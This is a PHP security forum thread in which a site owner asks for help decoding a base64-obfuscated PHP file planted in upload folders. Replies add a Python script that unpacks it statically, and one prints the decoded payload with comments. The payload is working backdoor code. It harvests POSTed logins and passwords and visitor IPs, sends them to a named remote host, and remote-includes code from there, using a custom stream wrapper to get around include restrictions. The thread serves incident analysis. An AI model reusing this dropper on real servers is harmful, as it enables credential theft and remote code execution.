Help in decoding XSS Script

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

prasant4u
Forum Newbie
Posts: 3
Joined: Tue Aug 10, 2010 12:44 am

Help in decoding XSS Script

Post by prasant4u »

A few days ago my forum had an XSS attack. I found a .htaccess and two randomly named PHP files (like base.php, create.php) injected in every one of my 777 upload folders. I am curious to know what code they used. Can someone decode this code please? Thanks in advance.

Code:

<?php error_reporting(0);$p="bfdhgzzazbzej";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnZhciAkZnVsbHVybDsgdmFyICRwX3VybDsgdmFyICRjb25uX2lkOyB2YXIgJGZsdXNoZWQ7IHZhciAkbW9kZSA9IDQ7IHZhciAkZGVmbW9kZTsgdmFyICRyZWRpcmVjdHMgPSAwOyB2YXIgJGJpbmFyeTsgdmFyICRvcHRpb25zOyB2YXIgJHN0YXQgPSBhcnJheSgnZGV2JyA9PiAwLCdpbm8nID0+IDAsJ21vZGUnID0+IDAsJ25saW5rJyA9PiAxLCd1aWQnID0+IDAsJ2dpZCcgPT4gMCwncmRldicgPT4gLTEsJ3NpemUnID0+IDAsJ2F0aW1lJyA9PiAwLCdtdGltZScgPT4gMCwnY3RpbWUnID0+IDAsJ2Jsa3NpemUnID0+IC0xLCdibG9ja3MnID0+IDApOw0KZnVuY3Rpb24gZXJyb3IoJG1zZz0nbm90IGNvbm5lY3RlZCcpIHsgaWYgKCR0aGlzLT5vcHRpb25zICYgU1RSRUFNX1JFUE9SVF9FUlJPUlMpIHsgdHJpZ2dlcl9lcnJvcigkbXNnLCBFX1VTRVJfV0FSTklORyk7IH0gcmV0dXJuIGZhbHNlOyB9DQpmdW5jdGlvbiBzdHJlYW1fb3BlbigkcGF0aCwgJG1vZGUsICRvcHRpb25zLCAkb3BlbmVkX3BhdGgpIHsgJHRoaXMtPmZ1bGx1cmwgPSAkcGF0aDsgJHRoaXMtPm9wdGlvbnMgPSAkb3B0aW9uczsgJHRoaXMtPmRlZm1vZGUgPSAkbW9kZTsgJHVybCA9IHBhcnNlX3VybCgkcGF0aCk7IGlmIChlbXB0eSgkdXJsWydob3N0J10pKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoJ21pc3NpbmcgaG9zdCBuYW1lJyk7IH0gJHRoaXMtPmNvbm5faWQgPSBmc29ja29wZW4oJHVybFsnaG9zdCddLCAoZW1wdHkoJHVybFsncG9ydCddKSA/IDgwIDogaW50dmFsKCR1cmxbJ3BvcnQnXSkpLCAkZXJybm8sICRlcnJzdHIsIDIpOyBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoZW1wdHkoJHVybFsncGF0aCddKSkgeyAkdXJsWydwYXRoJ10gPSAnLyc7IH0gJHRoaXMtPnBfdXJsID0gJHVybDsgJHRoaXMtPmZsdXNoZWQgPSBmYWxzZTsgaWYgKCRtb2RlWzBdICE9ICdyJyB8fCAoc3RycG9zKCRtb2RlLCAnKycpICE9PSBmYWxzZSkpIHsgJHRoaXMtPm1vZGUgKz0gMjsgfSAkdGhpcy0+YmluYXJ5ID0gKHN0cnBvcygkbW9kZSwgJ2InKSAhPT0gZmFsc2UpOyAkYyA9ICR0aGlzLT5jb250ZXh0KCk7IGlmICghaXNzZXQoJGNbJ21ldGhvZCddKSkgeyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdtZXRob2QnLCAnR0VUJyk7IH0gaWYgKCFpc3NldCgkY1snaGVhZGVyJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ2hlYWRlcicsICcnKTsgfSBpZiAoIWlzc2V0KCRjWyd1c2VyX2FnZW50J10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ3VzZXJfYWdlbnQnLCBpbmlfZ2V0KCd1c2VyX2FnZW50JykpOyB9IGlmICghaXNzZXQoJGNbJ2NvbnRlbnQnXSkpIHsgc3RyZWFtX2NvbnRl
eHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnY29udGVudCcsICcnKTsgfSBpZiAoIWlzc2V0KCRjWydtYXhfcmVkaXJlY3RzJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ21heF9yZWRpcmVjdHMnLCA1KTsgfSByZXR1cm4gdHJ1ZTsgfQ0KZnVuY3Rpb24gc3RyZWFtX2Nsb3NlKCkgeyBpZiAoJHRoaXMtPmNvbm5faWQpIHsgZmNsb3NlKCR0aGlzLT5jb25uX2lkKTsgJHRoaXMtPmNvbm5faWQgPSBudWxsOyB9IH0NCmZ1bmN0aW9uIHN0cmVhbV9yZWFkKCRieXRlcykgeyBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkICYmICEkdGhpcy0+c3RyZWFtX2ZsdXNoKCkpIHsgcmV0dXJuIGZhbHNlOyB9IGlmIChmZW9mKCR0aGlzLT5jb25uX2lkKSkgeyByZXR1cm4gJyc7IH0gJGJ5dGVzID0gbWF4KDEsJGJ5dGVzKTsgaWYgKCR0aGlzLT5iaW5hcnkpIHsgcmV0dXJuIGZyZWFkKCR0aGlzLT5jb25uX2lkLCAkYnl0ZXMpOyB9IGVsc2UgeyByZXR1cm4gZmdldHMoJHRoaXMtPmNvbm5faWQsICRieXRlcyk7IH0gfQ0KZnVuY3Rpb24gc3RyZWFtX3dyaXRlKCRkYXRhKSB7IGlmICghJHRoaXMtPmNvbm5faWQpIHsgcmV0dXJuICR0aGlzLT5lcnJvcigpOyB9IGlmICghJHRoaXMtPm1vZGUgJiAyKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoJ1N0cmVhbSBpcyBpbiByZWFkLW9ubHkgbW9kZScpOyB9ICRjID0gJHRoaXMtPmNvbnRleHQoKTsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnbWV0aG9kJywgKCgkdGhpcy0+ZGVmbW9kZVswXSA9PSAneCcpID8gJ1BVVCcgOiAnUE9TVCcpKTsgaWYgKHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ2NvbnRlbnQnLCAkY1snY29udGVudCddLiRkYXRhKSkgeyByZXR1cm4gc3RybGVuKCRkYXRhKTsgfSByZXR1cm4gMDsgfQ0KZnVuY3Rpb24gc3RyZWFtX2VvZigpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gdHJ1ZTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSByZXR1cm4gZmVvZigkdGhpcy0+Y29ubl9pZCk7IH0NCmZ1bmN0aW9uIHN0cmVhbV9zZWVrKCRvZmZzZXQsICR3aGVuY2UpIHsgcmV0dXJuIGZhbHNlOyB9DQpmdW5jdGlvbiBzdHJlYW1fdGVsbCgpIHsgcmV0dXJuIDA7IH0NCmZ1bmN0aW9uIHN0cmVhbV9mbHVzaCgpIHsgaWYgKCR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSAkYyA9ICR0aGlzLT5jb250ZXh0KCk7ICR0aGlzLT5mbHVzaGVkID0gdHJ1ZTsgJFJlcXVlc3RIZWFkZXJzID0gYXJyYXkoJGNbJ21ldGhvZCddLicgJy4kdGhpcy0+cF91cmxbJ3BhdGgnXS4oZW1wdHkoJHRoaXMtPnBfdXJsWydxdWVyeSddKSA/ICcnIDog
Jz8nLiR0aGlzLT5wX3VybFsncXVlcnknXSkuJyBIVFRQLzEuMCcsICdIT1NUOiAnLiR0aGlzLT5wX3VybFsnaG9zdCddLCAnVXNlci1BZ2VudDogJy4kY1sndXNlcl9hZ2VudCddLicgU3RyZWFtUmVhZGVyJyApOyBpZiAoIWVtcHR5KCRjWydoZWFkZXInXSkpIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAkY1snaGVhZGVyJ107IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSkgeyBpZiAoJGNbJ21ldGhvZCddID09ICdQVVQnKSB7ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtVHlwZTogJy4oJHRoaXMtPmJpbmFyeSA/ICdhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nIDogJ3RleHQvcGxhaW4nKTsgfSBlbHNlIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnOyB9ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtTGVuZ3RoOiAnLnN0cmxlbigkY1snY29udGVudCddKTsgfSAkUmVxdWVzdEhlYWRlcnNbXSA9ICdDb25uZWN0aW9uOiBjbG9zZSc7IGlmIChmd3JpdGUoJHRoaXMtPmNvbm5faWQsIGltcGxvZGUoIlxyXG4iLCAkUmVxdWVzdEhlYWRlcnMpLiJcclxuXHJcbiIpID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSAmJiBmd3JpdGUoJHRoaXMtPmNvbm5faWQsICRjWydjb250ZW50J10pID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gZ2xvYmFsICRodHRwX3Jlc3BvbnNlX2hlYWRlcjsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyID0gZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCk7ICRkYXRhID0gcnRyaW0oJGh0dHBfcmVzcG9uc2VfaGVhZGVyKTsgcHJlZ19tYXRjaCgnIy4qIChbMC05XSspICguKikjaScsICRkYXRhLCAkaGVhZCk7IGlmICgoJGhlYWRbMV0gPj0gMzAxICYmICRoZWFkWzFdIDw9IDMwMykgfHwgJGhlYWRbMV0gPT0gMzA3KSB7ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyBpZiAoc3RycG9zKCRkYXRhLCAnTG9jYXRpb246ICcpICE9PSBmYWxzZSkgeyAkbmV3X2xvY2F0aW9uID0gdHJpbShzdHJfcmVwbGFjZSgnTG9jYXRpb246ICcsICcnLCAkZGF0YSkpOyBicmVhazsgfSAkZGF0YSA9IHJ0cmltKGZnZXRzKCR0aGlzLT5jb25uX2lkLCAzMDApKTsgfSB0cmlnZ2VyX2Vycm9yKCR0aGlzLT5mdWxsdXJsLicgJy4kaGVhZFsyXS4nOiAnLiRuZXdfbG9jYXRpb24sIEVfVVNFUl9OT1RJQ0UpOyAkdGhpcy0+c3RyZWFtX2Nsb3NlKCk7IHJldHVybiAoJGNbJ21heF9yZWRpcmVjdHMnXSA+ICR0aGlzLT5yZWRpcmVjdHMrKyAmJiAkdGhpcy0+c3RyZWFtX29wZW4oJG5ld19sb2NhdGlvbiwgJHRoaXMtPmRlZm1vZGUsICR0aGlzLT5vcHRpb25zLCBudWxsKSAmJiAkdGhpcy0+c3RyZWFtX2ZsdXNoKCkpOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDEwMjQpKTsgd2hpbGUgKCFlbXB0eSgkZGF0
YSkpIHsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyIC49ICRkYXRhLiJcclxuIjsgaWYgKHN0cnBvcygkZGF0YSwnQ29udGVudC1MZW5ndGg6ICcpICE9PSBmYWxzZSkgeyAkdGhpcy0+c3RhdFsnc2l6ZSddID0gdHJpbShzdHJfcmVwbGFjZSgnQ29udGVudC1MZW5ndGg6ICcsICcnLCAkZGF0YSkpOyB9IGVsc2VpZiAoc3RycG9zKCRkYXRhLCdEYXRlOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ2F0aW1lJ10gPSBzdHJ0b3RpbWUoc3RyX3JlcGxhY2UoJ0RhdGU6ICcsICcnLCAkZGF0YSkpOyB9IGVsc2VpZiAoc3RycG9zKCRkYXRhLCdMYXN0LU1vZGlmaWVkOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ210aW1lJ10gPSBzdHJ0b3RpbWUoc3RyX3JlcGxhY2UoJ0xhc3QtTW9kaWZpZWQ6ICcsICcnLCAkZGF0YSkpOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDEwMjQpKTsgfSBpZiAoJGhlYWRbMV0gPj0gNDAwKSB7IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfV0FSTklORyk7IHJldHVybiBmYWxzZTsgfSBpZiAoJGhlYWRbMV0gPT0gMzA0KSB7IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfTk9USUNFKTsgcmV0dXJuIGZhbHNlOyB9IHJldHVybiB0cnVlOyB9DQpmdW5jdGlvbiBzdHJlYW1fc3RhdCgpIHsgJHRoaXMtPnN0cmVhbV9mbHVzaCgpOyByZXR1cm4gJHRoaXMtPnN0YXQ7IH0NCmZ1bmN0aW9uIGRpcl9vcGVuZGlyKCRwYXRoLCAkb3B0aW9ucykgeyByZXR1cm4gZmFsc2U7IH0NCmZ1bmN0aW9uIGRpcl9yZWFkZGlyKCkgeyByZXR1cm4gJyc7IH0NCmZ1bmN0aW9uIGRpcl9yZXdpbmRkaXIoKSB7IHJldHVybiAnJzsgfQ0KZnVuY3Rpb24gZGlyX2Nsb3NlZGlyKCkgeyByZXR1cm47IH0NCmZ1bmN0aW9uIHVybF9zdGF0KCRwYXRoLCAkZmxhZ3MpIHsgcmV0dXJuIGFycmF5KCk7IH0NCmZ1bmN0aW9uIGNvbnRleHQoKSB7IGlmICghJHRoaXMtPmNvbnRleHQpIHsgJHRoaXMtPmNvbnRleHQgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoKTsgfSAkYyA9IHN0cmVhbV9jb250ZXh0X2dldF9vcHRpb25zKCR0aGlzLT5jb250ZXh0KTsgcmV0dXJuIChpc3NldCgkY1snaHR0cCddKSA/ICRjWydodHRwJ10gOiBhcnJheSgpKTsgfQ0KfWlmKGlzc2V0KCRfUE9TVFsibCJdKSBhbmQgaXNzZXQoJF9QT1NUWyJwIl0pKXtpZihpc3NldCgkX1BPU1RbImlucHV0Il0pKXskdXNlcl9hdXRoPSImbD0iLmJhc2U2NF9lbmNvZGUoJF9QT1NUWyJsIl0pLiImcD0iLmJhc2U2NF9lbmNvZGUobWQ1KCRfUE9TVFsicCJdKSk7fWVsc2V7JHVzZXJfYXV0aD0iJmw9Ii4kX1BPU1RbImwiXS4iJnA9Ii4kX1BPU1RbInAiXTt9fWVsc2V7JHVzZXJfYXV0aD0iIjt9aWYoIWlzc2V0KCRfUE9TVFsibG9nX2ZsZyJdKSl7JGxvZ19mbGc9IiZsb2ciO30NCiRya2h0PTE7aWYodmVyc2lvbl9jb21wYXJlKFBIUF9WRVJTSU9OLCc1LjInLCc+PScpKXtpZihp
bmlfZ2V0KCdhbGxvd191cmxfaW5jbHVkZScpKXskcmtodD0xO31lbHNleyRya2h0PTA7fX0NCmlmKCRya2h0PT0xKXtpZihpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSl7JHJraHQ9MTt9ZWxzZXskcmtodD0wO319DQokdj0kcC5iYXNlNjRfZGVjb2RlKCJMblZ6WlhKekxtSnBjMmhsYkd3dWNuVT0iKS4iLz9yX2FkZHI9Ii5zcHJpbnRmKCIldSIsIGlwMmxvbmcoZ2V0ZW52KCJSRU1PVEVfQUREUiIpKSkuIiZ1cmw9Ii5iYXNlNjRfZW5jb2RlKCRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdLiRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdKS4kdXNlcl9hdXRoLiRsb2dfZmxnOw0KaWYoJHJraHQ9PTEpe2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjRG92THc9PSIpLiR2KSl7fX0NCmVsc2V7c3RyZWFtX3dyYXBwZXJfcmVnaXN0ZXIoJ2h0dHAyJywnbmV3aHR0cCcpO2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjREk2THk4PSIpLiR2KSl7fX0=")); ?>
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Help in decoding XSS Script

Post by Mordred »

Simple: replace eval with print.
Also, this is not XSS; it's either compromised FTP or a compromised upload script.
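Replacing eval with print does the job, but it still runs the attacker's outer stub in a PHP interpreter, and it has to be repeated for every nested layer. The script below is an added example, not code from the thread: it unwraps eval(base64_decode(...)) layers statically, tolerates the line-wrapping a pasted blob picks up (the blob in the first post is split across several lines), decodes the remaining base64_decode("...") constants, and rebuilds the callback host from the outer $p. The sample stub is constructed here to match the shape of the posted one and reuses its three base64 constants, which decode to ".users.bishell.ru", "http://" and "http2://"; the function and variable names are mine.

```python
import base64
import re

# eval(base64_decode("...")): whitespace inside the quotes is tolerated because a
# pasted blob is often line-wrapped; it is stripped before decoding.
EVAL_B64 = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+?)["\']\s*\)\s*\)')
# Any other base64_decode("...") constant: droppers hide hostnames and schemes this way.
CONST_B64 = re.compile(r'base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
# Simple scalar assignment such as $p="bfdhgzzazbzej"; (used to rebuild the host).
ASSIGN = re.compile(r'\$(\w+)\s*=\s*["\']([^"\']*)["\']\s*;')


def b64_text(blob):
    """Decode one base64 blob to text; None if it is not valid base64."""
    try:
        raw = base64.b64decode(re.sub(r"\s+", "", blob), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-8", "replace")


def peel_eval_layers(src, max_layers=16):
    """Statically unwrap nested eval(base64_decode(...)) without executing anything.
    Returns the layers outermost first; the last one is the real payload."""
    layers = [src]
    for _ in range(max_layers):
        m = EVAL_B64.search(layers[-1])
        if not m:
            break
        inner = b64_text(m.group(1))
        if inner is None:
            break
        layers.append(inner)
    return layers


def hidden_constants(php):
    """Decode every base64_decode("...") constant found in one layer, in source order."""
    return [s for s in (b64_text(b) for b in CONST_B64.findall(php)) if s is not None]


def scalar_assignments(php):
    """Map of $name => "value" for plain string assignments in a layer."""
    return dict(ASSIGN.findall(php))


def triage(src):
    """Return the payload, its decoded constants and the rebuilt callback host."""
    layers = peel_eval_layers(src)
    payload = layers[-1]
    consts = hidden_constants(payload)
    p = scalar_assignments(layers[0]).get("p", "")
    suffix = next((c for c in consts if c.startswith(".")), "")
    return {"layers": len(layers), "payload": payload,
            "constants": consts, "host": p + suffix}


# Constructed sample (not the blob from the post): the outer stub with the same $p and
# a cut-down inner payload that keeps the dropper's three base64 constants.
INNER_PAYLOAD = (
    '$v=$p.base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".'
    'sprintf("%u", ip2long(getenv("REMOTE_ADDR")));'
    'if($rkht==1){if(!@include_once(base64_decode("aHR0cDovLw==").$v)){}}'
    'else{stream_wrapper_register("http2","newhttp");'
    'if(!@include_once(base64_decode("aHR0cDI6Ly8=").$v)){}}'
)


def wrapped_b64(text, width=76):
    """Base64-encode and hard-wrap, as a forum or mail client would."""
    blob = base64.b64encode(text.encode()).decode()
    return "\n".join(blob[i:i + width] for i in range(0, len(blob), width))


SAMPLE = ('<?php error_reporting(0);$p="bfdhgzzazbzej";eval(base64_decode("'
          + wrapped_b64(INNER_PAYLOAD) + '")); ?>')

if __name__ == "__main__":
    result = triage(SAMPLE)
    print("layers:", result["layers"])
    print("constants:", result["constants"])
    print("callback host:", result["host"])
    print(result["payload"])
```

Run it against a copy of the dropped file instead of SAMPLE and the last layer is the PHP to read; the decoded constants give you the host to block and search for in access logs.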
prasant4u
Forum Newbie
Posts: 3
Joined: Tue Aug 10, 2010 12:44 am

Re: Help in decoding XSS Script

Post by prasant4u »

Thanks for your reply. So does this mean they got my FTP details? I have now moved from mod_php to FastCGI (with Apache suexec enabled), so my upload folders now have 755 permissions. Can only 777 folders have this type of security problem?

If possible, please decode some lines for me. I can't get it.
Sephern
Forum Commoner
Posts: 73
Joined: Sun Jan 04, 2009 4:44 pm

Re: Help in decoding XSS Script

Post by Sephern »

Code:

<?php
class newhttp{
var $fullurl;
var $p_url; 
var $conn_id; 
var $flushed; 
var $mode = 4; 
var $defmode; 
var $redirects = 0; 
var $binary; 
var $options; 
var $stat = array('dev' => 0,'ino' => 0,'mode' => 0,'nlink' => 1,'uid' => 0,'gid' => 0,'rdev' => -1,'size' => 0,'atime' => 0,'mtime' => 0,'ctime' => 0,'blksize' => -1,'blocks' => 0);
function error($msg='not connected') { 
	if ($this->options & STREAM_REPORT_ERRORS)
	{ 
		trigger_error($msg, E_USER_WARNING);
	}
	return false;
}
function stream_open($path, $mode, $options, $opened_path) { 
	$this->fullurl = $path; 
	$this->options = $options; 
	$this->defmode = $mode; 
	$url = parse_url($path); 
	if (empty($url['host'])) 
	{
		return $this->error('missing host name');
 	}
	$this->conn_id = fsockopen($url['host'], (empty($url['port']) ? 80 : intval($url['port'])), $errno, $errstr, 2);
	if (!$this->conn_id)
	{
		return false;
	}
	if (empty($url['path'])) 
	{ 
		$url['path'] = '/';
	}
	$this->p_url = $url;
	$this->flushed = false;
	if ($mode[0] != 'r' || (strpos($mode, '+') !== false))
	{ 
		$this->mode += 2;
	}
	$this->binary = (strpos($mode, 'b') !== false); 
	$c = $this->context(); 
	if (!isset($c['method'])) 
	{ 
		stream_context_set_option($this->context, 'http', 'method', 'GET');
	}
	if (!isset($c['header']))
	{ 
		stream_context_set_option($this->context, 'http', 'header', '');
	} 
	if (!isset($c['user_agent'])) 
	{ 
		stream_context_set_option($this->context, 'http', 'user_agent', ini_get('user_agent'));
 	} 
	if (!isset($c['content'])) 
	{
		stream_context_set_option($this->context, 'http', 'content', ''); 
	} 
	if (!isset($c['max_redirects'])) 
	{ 
		stream_context_set_option($this->context, 'http', 'max_redirects', 5); 
	} 
	return true; 
}
function stream_close() {
	if ($this->conn_id) 
	{
		fclose($this->conn_id); 
		$this->conn_id = null;
 	} 
}
function stream_read($bytes) { 
	if (!$this->conn_id) 
	{ 
		return $this->error(); 
	} 
	if (!$this->flushed && !$this->stream_flush()) 
	{ 
		return false;
	} 
	if (feof($this->conn_id)) 
	{ 
		return ''; 
	}
	$bytes = max(1,$bytes);
	if ($this->binary) 
	{ 
		return fread($this->conn_id, $bytes); 
	} 
	else 
	{ 
		return fgets($this->conn_id, $bytes); 
	} 
}
function stream_write($data) { 
	if (!$this->conn_id) 
	{ 
		return $this->error();
	} 
	if (!$this->mode & 2) 
	{ 
		return $this->error('Stream is in read-only mode'); 
	} 
	$c = $this->context(); 
	stream_context_set_option($this->context, 'http', 'method', (($this->defmode[0] == 'x') ? 'PUT' : 'POST'));
	if (stream_context_set_option($this->context, 'http', 'content', $c['content'].$data)) 
	{ 
		return strlen($data);
	} 
	return 0; 
}
function stream_eof() { 
	if (!$this->conn_id) 
	{ 
		return true; 
	} 
	if (!$this->flushed) 
	{ 
		return false;
	} 
	return feof($this->conn_id);
}
function stream_seek($offset, $whence) { //lolwut? Bit of a pointless function? ~Sephern 
	return false; 
}
function stream_tell() { 
	return 0; 
}
function stream_flush() { 
	if ($this->flushed) 
	{ 
		return false; 
	} 
	if (!$this->conn_id) 
	{ 
		return $this->error(); 
	} 
	$c = $this->context();
	$this->flushed = true; 
	$RequestHeaders = array($c['method'].' '.$this->p_url['path'].(empty($this->p_url['query']) ? '' : '?'.$this->p_url['query']).' HTTP/1.0', 'HOST: '.$this->p_url['host'], 'User-Agent: '.$c['user_agent'].' StreamReader' );
	if (!empty($c['header'])) 
	{ 
		$RequestHeaders[] = $c['header'];
	} 
	if (!empty($c['content'])) 
	{ 
		if ($c['method'] == 'PUT') 
		{ 
			$RequestHeaders[] = 'Content-Type: '.($this->binary ? 'application/octet-stream' : 'text/plain');
		} 
		else 
		{ 
			$RequestHeaders[] = 'Content-Type: application/x-www-form-urlencoded';
		} 
		$RequestHeaders[] = 'Content-Length: '.strlen($c['content']);
	}
	$RequestHeaders[] = 'Connection: close';
	if (fwrite($this->conn_id, implode("\r\n", $RequestHeaders)."\r\n\r\n") === false)
	{
		return false;
	}
	if (!empty($c['content']) && fwrite($this->conn_id, $c['content']) === false)
	{
		return false;
	}
	global $http_response_header;
	$http_response_header = fgets($this->conn_id, 300);
	$data = rtrim($http_response_header);
	preg_match('#.* ([0-9]+) (.*)#i', $data, $head);
	if (($head[1] >= 301 && $head[1] <= 303) || $head[1] == 307)
	{
		$data = rtrim(fgets($this->conn_id, 300));
		while (!empty($data))
		{
			if (strpos($data, 'Location: ') !== false)
			{
				$new_location = trim(str_replace('Location: ', '', $data));
				break;
			}
			$data = rtrim(fgets($this->conn_id, 300));
		}
		trigger_error($this->fullurl.' '.$head[2].': '.$new_location, E_USER_NOTICE);
		$this->stream_close();
		return ($c['max_redirects'] > $this->redirects++ && $this->stream_open($new_location, $this->defmode, $this->options, null) && $this->stream_flush());
	}
	$data = rtrim(fgets($this->conn_id, 1024));
	while (!empty($data))
	{
		$http_response_header .= $data."\r\n";
		if (strpos($data,'Content-Length: ') !== false)
		{
			$this->stat['size'] = trim(str_replace('Content-Length: ', '', $data));
		}
		elseif (strpos($data,'Date: ') !== false)
		{
			$this->stat['atime'] = strtotime(str_replace('Date: ', '', $data));
		}
		elseif (strpos($data,'Last-Modified: ') !== false)
		{
			$this->stat['mtime'] = strtotime(str_replace('Last-Modified: ', '', $data));
		}
		$data = rtrim(fgets($this->conn_id, 1024));
	}
	if ($head[1] >= 400)
	{
		trigger_error($this->fullurl.' '.$head[2], E_USER_WARNING);
		return false;
	}
	if ($head[1] == 304)
	{
		trigger_error($this->fullurl.' '.$head[2], E_USER_NOTICE);
		return false;
	}
	return true;
}
function stream_stat() {
	$this->stream_flush();
	return $this->stat;
}
function dir_opendir($path, $options) {
	return false;
}
function dir_readdir() {
	return '';
}
function dir_rewinddir() {
	return '';
}
function dir_closedir() {
	return;
}
function url_stat($path, $flags) {
	return array();
}
function context() {
	if (!$this->context)
	{
		$this->context = stream_context_create();
	}
	$c = stream_context_get_options($this->context);
	return (isset($c['http']) ? $c['http'] : array());
}
}
// Harvest what look like login (l) and password (p) fields POSTed to the infected page
// so they can be forwarded to the remote host below. With "input" also set, the
// password is MD5-hashed and both values are base64-encoded first.
if(isset($_POST["l"]) and isset($_POST["p"]))
{
	if(isset($_POST["input"]))
	{
		$user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));
	}
	else
	{
		$user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];
	}
}
else
{
	$user_auth="";
}
// "&log" is appended unless the caller suppresses it by POSTing log_flg.
if(!isset($_POST["log_flg"]))
{
	$log_flg="&log";
}
// Decide whether a plain http:// include will work: on PHP >= 5.2 it needs
// allow_url_include, and in any case allow_url_fopen. $rkht stays 1 only if both are on.
$rkht=1;
if(version_compare(PHP_VERSION,'5.2','>='))
{
	if(ini_get('allow_url_include'))
	{
		$rkht=1;
	}
	else
	{
		$rkht=0;
	}
}
if($rkht==1)
{
	if(ini_get('allow_url_fopen'))
	{
		$rkht=1;
	}
	else
	{
		$rkht=0;
	}
}
// base64_decode("LnVzZXJzLmJpc2hlbGwucnU=") is ".users.bishell.ru"; with $p from the outer
// stub the callback host is bfdhgzzazbzej.users.bishell.ru. The query string carries the
// visitor's IP (ip2long, printed unsigned), the infected page's host and URI (base64),
// the harvested credentials and the log flag.
$v=$p.base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".sprintf("%u", ip2long(getenv("REMOTE_ADDR")))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]).$user_auth.$log_flg;
// base64_decode("aHR0cDovLw==") is "http://": a straight remote include when the ini settings allow it.
if($rkht==1)
{
	if(!@include_once(base64_decode("aHR0cDovLw==").$v))
	{
	}
}
// Otherwise register the newhttp class above as the "http2" wrapper and include through
// base64_decode("aHR0cDI6Ly8=") = "http2://". The wrapper is registered without
// STREAM_IS_URL, so PHP treats it as a local stream and allow_url_include/allow_url_fopen
// do not apply to it; the remote include happens either way.
else
{
	stream_wrapper_register('http2','newhttp');
	if(!@include_once(base64_decode("aHR0cDI6Ly8=").$v))
	{
	}
}
?>
Decoded and tabulated for your viewing pleasure.

It would appear to be a shell script, which has taken advantage of an LFI vulnerability in your website.
@Mordred, while this is probably the most likely conclusion, there are other ways of exploiting file inclusion vulnerabilities.
Last edited by Weirdan on Thu Aug 12, 2010 5:56 pm, edited 1 time in total.
Reason: [php] -> [syntax=php]
